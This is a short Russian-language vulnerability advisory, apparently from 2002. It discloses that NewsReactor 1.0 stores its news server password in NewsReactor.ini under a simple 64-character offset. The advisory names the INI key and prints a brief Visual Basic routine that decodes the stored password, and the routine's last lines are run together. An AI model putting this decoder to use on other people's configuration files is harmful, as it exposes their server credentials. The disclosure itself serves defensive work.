Security Lab

Раскрытие информации в NewsReactor

Дата публикации:24.01.2002
Всего просмотров:794
Опасность:
Наличие исправления:
Количество уязвимостей:1
CVE ID: Нет данных
Вектор эксплуатации:
Воздействие:
CWE ID: Нет данных
Наличие эксплоита: Нет данных
Уязвимые продукты:
Описание: NewsReactor – News сервер для Microsoft Windows, поставляемый DaanSystems.

NewsReactor сохраняет информацию конфигурации сервера телеконференций в файле NewsReactor.ini. Пароль доступа к серверу телеконференций хранится в зашифрованном виде, используя технику кодирования slide-rule. Но когда пароль сохранен в файле NewsReactor.ini используется простой формат кодирования со смещением в 64 символа. Уязвимость найдена в DaanSystems NewsReactor 1.0

Эксплоит:

Пароль хранится после "Server0PassWord=" в файле NewsReactor.ini.

Private Sub Form_Load()
Dim YourPass As String, PrintPass As String
YourPass = InputBox("Enter in the encrypted password below.") 
For x = 1 To Len(YourPass)
    PrintPass = PrintPass & Chr(Asc(Mid(YourPass, x, 1)) - 64) 
Next MsgBox "Password: " & PrintPass End End Sub
Ссылки: http://www.daansystems.com/newsreactor